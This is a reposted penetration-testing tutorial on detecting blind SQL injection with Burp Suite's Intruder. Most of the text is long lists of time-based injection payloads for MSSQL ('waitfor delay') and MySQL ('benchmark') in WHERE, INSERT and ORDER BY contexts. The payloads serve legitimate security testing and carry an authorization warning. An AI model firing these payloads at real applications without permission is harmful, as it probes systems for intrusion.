开发者社区> 技术小美> 正文

Blind SQL Injection detection with Burp Suite

简介:
+关注继续查看

1. Introduction

Burp suite is local proxy software (man-in-the-middle application) helping a penetration tester to perform deep analysis and security checks of the HTTP conversation, between a browser and a web application. Burp suite holds many useful plug-ins such as Spider, Repeater, Scanner, Decoder, … for achieving this job.

The module on which we focus on is called Intruder. With this plug-in, you are able to run customised attacks against a Web application, by sending multiple payload type at multiple positions inside the headers/body of an HTTP request, and quickly check against the information responded.

This article provides some intresting SQL payload that you can use with the Intruder module of Burp suite.

Warning: Don’t use this tutorial against web applications if you are not the owner or have the authorization of the responsible.

2. SQL Injection detection

As you know, detect an SQL injection issue “manually” could be easy to do. But it is not always true for an “automatic” vulnerability scanner. That’s why we would like to give a second chance to detect such vulnerabilities with smart “customized attacks“ of Burp suite.

In order to find SQL injection issues behind specific parameters of a page, we will simply use some usual time-base consuming SQL statements such as “waitfor delay” (for MS-SQL) and “benchmark()” (for MySQL), and sort the HTTP responses by “Response Time Completed“. By this way, we will able to quickly find the interesting responses among the list.


3. Burp Suite example

This is a short example of a blind SQL injection detection with Burp suite (we assume you already have some knowledge of Burp suite usage. If not, enjoy this tool).

First, we send a recorded HTTP request to the Intruder module and set up the position where the payload will have to be injected (in red).




Next, we load our Payloads list (see next section) from a text file. These payloads will use the benchmarck() MySQL function, and will ask to compute MD5(1) 3,000,000 times in order to delay the response.

Important: add a white space in the list “URL-encode these characters” (on the bottom of the page) if there is no one already.

And then we start the attack (see Intruder menu).

When it will be finished, the responses will be displayed in a table format. Here we have sorted the result by “Response complete” to get immediately which payloads have triggered the vulnerability.




As you see on the previous screenshot, request 27 took more than 17 seconds to complete with the following payload:

") and 0=benchmark(3000000,MD5(1)) #

The complete SQL statement was :

SELECT * FROM user WHERE id=("1") AND 0=benchmark(3000000,MD5(1)) # OR mid="1"

 

4. SQL injection entry points

Because there are so many ways to write an SQL statement, we will not be able to provide an exhaustive list of payloads for each kind of SQL command and injection issue. We will try to build a good list of valid SQL payloads for the following statements:

4.1 WHERE/ASSIGNATION

Which should match statements such as:

SELECT a FROM tbl WHERE item=x payload
DELETE FROM tbl WHERE item=x payload
UPDATE tbl SET item1=x payload1 WHERE item2=x payload2
4.2. INSERT/UPDATE

Which should match statements such as:

INSERT INTO tbl(a,b,c) VALUES(x payload1, y payload2 )
UPDATE tbl(a,b) SET VALUES(x payload1, y payload2) WHERE item=value
4.3. ORDER BY/ASC/DESC

Which should match statements such as:

SELECT a FROM tbl <WHERE ...> ORDER BY value,payload1 ASC,payload2

5. The Payloads

So far, we will try to focus on MSSQL (using “waitfor delay command to introduce time delay) and MySQL Server (using benchmark() function to generate long CPU activities).

For each injection, we will:

  • use quotedouble-quoteparenthesis or blank characters to close everything written before the injected payload.
  • play with multiple level of parenthesis.
  • ending the SQL statement with { /* ,  } for MSSQL, and { /* ,   , # } for MySQL.
  • for insert only: try different number of columns for values().

5.1. Download

Download the full list of payloads: payloads-sql-blind.tar.gz

5.2. Content:

payloads-sql-blind-MSSQL-INSERT.txt
payloads-sql-blind-MSSQL-WHERE.txt
payloads-sql-blind-MySQL-INSERT.txt
payloads-sql-blind-MySQL-WHERE.txt
payloads-sql-blind-MySQL-ORDER_BY.txt

 

payloads-sql-blind-MSSQL-INSERT.txt

)%20waitfor%20delay%20'0:0:20'%20/*
)%20waitfor%20delay%20'0:0:20'%20--
')%20waitfor%20delay%20'0:0:20'%20/*
')%20waitfor%20delay%20'0:0:20'%20--
")%20waitfor%20delay%20'0:0:20'%20/*
")%20waitfor%20delay%20'0:0:20'%20--
))%20waitfor%20delay%20'0:0:20'%20/*
))%20waitfor%20delay%20'0:0:20'%20--
'))%20waitfor%20delay%20'0:0:20'%20/*
'))%20waitfor%20delay%20'0:0:20'%20--
"))%20waitfor%20delay%20'0:0:20'%20/*
"))%20waitfor%20delay%20'0:0:20'%20--
,NULL)%20waitfor%20delay%20'0:0:20'%20/*
,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL)%20waifor%20delay%20'0:0:20'%20/*
',NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL)%20waifor%20delay%20'0:0:20'%20/*
'),NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
',NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
',NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
',NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
',NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
',NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
',NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--

payloads-sql-blind-MSSQL-WHERE.txt

 waitfor delay '0:0:20' /*
waitfor delay '0:0:20' --
' waitfor delay '0:0:20' /*
' waitfor delay '0:0:20' --
" waitfor delay '0:0:20' /*
" waitfor delay '0:0:20' --
) waitfor delay '0:0:20' /*
) waitfor delay '0:0:20' --
)) waitfor delay '0:0:20' /*
)) waitfor delay '0:0:20' --
))) waitfor delay '0:0:20' /*
))) waitfor delay '0:0:20' --
)))) waitfor delay '0:0:20' /*
)))) waitfor delay '0:0:20' --
))))) waitfor delay '0:0:20' --
)))))) waitfor delay '0:0:20' --
') waitfor delay '0:0:20' /*
') waitfor delay '0:0:20' --
") waitfor delay '0:0:20' /*
") waitfor delay '0:0:20' --
')) waitfor delay '0:0:20' /*
')) waitfor delay '0:0:20' --
")) waitfor delay '0:0:20' /*
")) waitfor delay '0:0:20' --
'))) waitfor delay '0:0:20' /*
'))) waitfor delay '0:0:20' --
"))) waitfor delay '0:0:20' /*
"))) waitfor delay '0:0:20' --
')))) waitfor delay '0:0:20' /*
')))) waitfor delay '0:0:20' --
")))) waitfor delay '0:0:20' /*
")))) waitfor delay '0:0:20' --
'))))) waitfor delay '0:0:20' /*
'))))) waitfor delay '0:0:20' --
"))))) waitfor delay '0:0:20' /*
"))))) waitfor delay '0:0:20' --
')))))) waitfor delay '0:0:20' /*
')))))) waitfor delay '0:0:20' --
")))))) waitfor delay '0:0:20' /*
")))))) waitfor delay '0:0:20' --

payloads-sql-blind-MySQL-INSERT.txt

+if(benchmark(3000000,MD5(1)),NULL,NULL))%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL))%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL))%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL))%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL))%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL))%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL))%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL))%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL))%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23

payloads-sql-blind-MySQL-WHERE.txt

 and 0=benchmark(3000000,MD5(1))%20/*
and 0=benchmark(3000000,MD5(1))%20--
and 0=benchmark(3000000,MD5(1))%20%23
' and 0=benchmark(3000000,MD5(1))%20/*
' and 0=benchmark(3000000,MD5(1))%20--
' and 0=benchmark(3000000,MD5(1))%20%23
" and 0=benchmark(3000000,MD5(1))%20/*
" and 0=benchmark(3000000,MD5(1))%20--
" and 0=benchmark(3000000,MD5(1))%20%23
) and 0=benchmark(3000000,MD5(1))%20/*
) and 0=benchmark(3000000,MD5(1))%20--
) and 0=benchmark(3000000,MD5(1))%20%23
)) and 0=benchmark(3000000,MD5(1))%20/*
)) and 0=benchmark(3000000,MD5(1))%20--
)) and 0=benchmark(3000000,MD5(1))%20%23
))) and 0=benchmark(3000000,MD5(1))%20/*
))) and 0=benchmark(3000000,MD5(1))%20--
))) and 0=benchmark(3000000,MD5(1))%20%23
)))) and 0=benchmark(3000000,MD5(1))%20/*
)))) and 0=benchmark(3000000,MD5(1))%20--
)))) and 0=benchmark(3000000,MD5(1))%20%23
') and 0=benchmark(3000000,MD5(1))%20/*
') and 0=benchmark(3000000,MD5(1))%20--
') and 0=benchmark(3000000,MD5(1))%20%23
") and 0=benchmark(3000000,MD5(1))%20/*
") and 0=benchmark(3000000,MD5(1))%20--
") and 0=benchmark(3000000,MD5(1))%20%23
')) and 0=benchmark(3000000,MD5(1))%20/*
')) and 0=benchmark(3000000,MD5(1))%20--
')) and 0=benchmark(3000000,MD5(1))%20%23
")) and 0=benchmark(3000000,MD5(1))%20/*
")) and 0=benchmark(3000000,MD5(1))%20--
")) and 0=benchmark(3000000,MD5(1))%20%23
'))) and 0=benchmark(3000000,MD5(1))%20/*
'))) and 0=benchmark(3000000,MD5(1))%20--
'))) and 0=benchmark(3000000,MD5(1))%20%23
"))) and 0=benchmark(3000000,MD5(1))%20/*
"))) and 0=benchmark(3000000,MD5(1))%20--
"))) and 0=benchmark(3000000,MD5(1))%20%23
')))) and 0=benchmark(3000000,MD5(1))%20/*
')))) and 0=benchmark(3000000,MD5(1))%20--
')))) and 0=benchmark(3000000,MD5(1))%20%23
")))) and 0=benchmark(3000000,MD5(1))%20/*
")))) and 0=benchmark(3000000,MD5(1))%20--
")))) and 0=benchmark(3000000,MD5(1))%20%23

payloads-sql-blind-MySQL-ORDER_BY.txt

,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
'),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
'),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
'),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
"),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
"),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
"),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23

 

6. The End

Enjoy this tutorial and these SQL payloads.


New payloads suggestions are welcome !













本文转hackfreer51CTO博客,原文链接:http://blog.51cto.com/pnig0s1992/499917,如需转载请自行联系原作者

版权声明:本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。

相关文章
阿里云服务器如何登录?阿里云服务器的三种登录方法
购买阿里云ECS云服务器后如何登录?场景不同,大概有三种登录方式:
10016 0
使用SSH远程登录阿里云ECS服务器
远程连接服务器以及配置环境
13981 0
阿里云服务器怎么设置密码?怎么停机?怎么重启服务器?
如果在创建实例时没有设置密码,或者密码丢失,您可以在控制台上重新设置实例的登录密码。本文仅描述如何在 ECS 管理控制台上修改实例登录密码。
20697 0
阿里云服务器如何登录?阿里云服务器的三种登录方法
购买阿里云ECS云服务器后如何登录?场景不同,云吞铺子总结大概有三种登录方式: 登录到ECS云服务器控制台 在ECS云服务器控制台用户可以更改密码、更换系统盘、创建快照、配置安全组等操作如何登录ECS云服务器控制台? 1、先登录到阿里云ECS服务器控制台 2、点击顶部的“控制台” 3、通过左侧栏,切换到“云服务器ECS”即可,如下图所示 通过ECS控制台的远程连接来登录到云服务器 阿里云ECS云服务器自带远程连接功能,使用该功能可以登录到云服务器,简单且方便,如下图:点击“远程连接”,第一次连接会自动生成6位数字密码,输入密码即可登录到云服务器上。
33617 0
阿里云服务器端口号设置
阿里云服务器初级使用者可能面临的问题之一. 使用tomcat或者其他服务器软件设置端口号后,比如 一些不是默认的, mysql的 3306, mssql的1433,有时候打不开网页, 原因是没有在ecs安全组去设置这个端口号. 解决: 点击ecs下网络和安全下的安全组 在弹出的安全组中,如果没有就新建安全组,然后点击配置规则 最后如上图点击添加...或快速创建.   have fun!  将编程看作是一门艺术,而不单单是个技术。
18998 0
使用NAT网关轻松为单台云服务器设置多个公网IP
在应用中,有时会遇到用户询问如何使单台云服务器具备多个公网IP的问题。 具体如何操作呢,有了NAT网关这个也不是难题。
35349 0
阿里云服务器如何登录?阿里云服务器的三种登录方法
购买阿里云ECS云服务器后如何登录?场景不同,阿里云优惠总结大概有三种登录方式: 登录到ECS云服务器控制台 在ECS云服务器控制台用户可以更改密码、更换系.
25240 0
如何设置阿里云服务器安全组?阿里云安全组规则详细解说
阿里云安全组设置详细图文教程(收藏起来) 阿里云服务器安全组设置规则分享,阿里云服务器安全组如何放行端口设置教程。阿里云会要求客户设置安全组,如果不设置,阿里云会指定默认的安全组。那么,这个安全组是什么呢?顾名思义,就是为了服务器安全设置的。安全组其实就是一个虚拟的防火墙,可以让用户从端口、IP的维度来筛选对应服务器的访问者,从而形成一个云上的安全域。
17208 0
windows server 2008阿里云ECS服务器安全设置
